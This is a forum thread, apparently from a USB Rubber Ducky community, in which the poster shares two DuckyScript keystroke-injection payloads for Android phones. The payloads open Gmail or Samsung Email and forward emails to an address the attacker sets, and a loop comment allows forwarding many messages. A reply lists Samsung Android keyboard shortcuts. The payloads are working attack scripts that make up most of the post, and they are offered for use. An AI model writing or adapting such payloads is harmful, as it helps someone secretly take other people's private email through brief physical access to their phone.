Jump to content

[Payload] Android phone forward email


Recommended Posts

I was playing around with the ducky and an android phone and wrote a payload to forward an email to the address specified.

There are two version one for Gmail and one for Samsung Email. Use GUI + E to find your default app.
I put a comment in for a loop so if you wish to forward more than one.

GMAIL:

REM Forwards the first email in the primary section
REM Only works for phones. 
REM Does not work tablets as menu bar stops tabs
REM GMAIL SHORTCUTS https://support.google.com/mail/answer/6594?co=GENIE.Platform%3DAndroid&hl=en&oco=1
DELAY 1000
GUI e
DELAY 1000
TAB
DELAY 500
TAB
DELAY 500
ENTER
REM LOOP FROM HERE
DELAY 500
CTRL r
DELAY 1000
TAB
DELAY 500
SHIFT TAB
DELAY 500
BACKSPACE
DELAY 500
STRING your@email.com
CTRL ENTER
DELAY 1000
REM Moves to the next email
RIGHTARROW
REM GOTO LOOP

SAMSUNG:

REM Forwards the first email
DELAY 1000
GUI e
DELAY 1000
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
REM LOOP FROM HERE
DELAY 500
SHIFT TAB
DELAY 500
LEFTARROW
LEFTARROW
LEFTARROW
LEFTARROW
RIGHTARROW
RIGHTARROW
ENTER
DELAY 500
STRING your@email.com
DELAY 500
SHIFT TAB
DELAY 500
SHIFT TAB
DELAY 500
ENTER
DELAY 500
REM Moves to the next email
TAB
RIGHTARROW
RIGHTARROW
LEFTARROW
ENTER
REM GOTO LOOP

 

Link to comment
Share on other sites

Probably not as many manufacturers add/remove shortcuts

Here are the shortcuts for a Samsung don't know how many are generic to Android:

Home screen:

  •     Apps list - Alt + A

System:

  •     Home - GUI + Enter
  •     Back - GUI + Backspace
  •     Recent - Alt + Tab
  •     Notifications - GUI + N
  •     Keyboard shortcuts - GUI + /
  •     Lock Screen - GUI + L
  •     Switch Languages - SHIFT + SPACE
  •     Switch Languages - CTRL + SPACE
  •     Switch Languages - LEFT ALT + SHIFT
  •     Start/Exit DeX mode GUI + W

Applications:

  •     Browser - GUI + B
  •     Contacts - GUI + C
  •     Email - GUI + E
  •     Messages - GUI + S
  •     Music - GUI + P
  •     Calendar - GUI + K

 

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...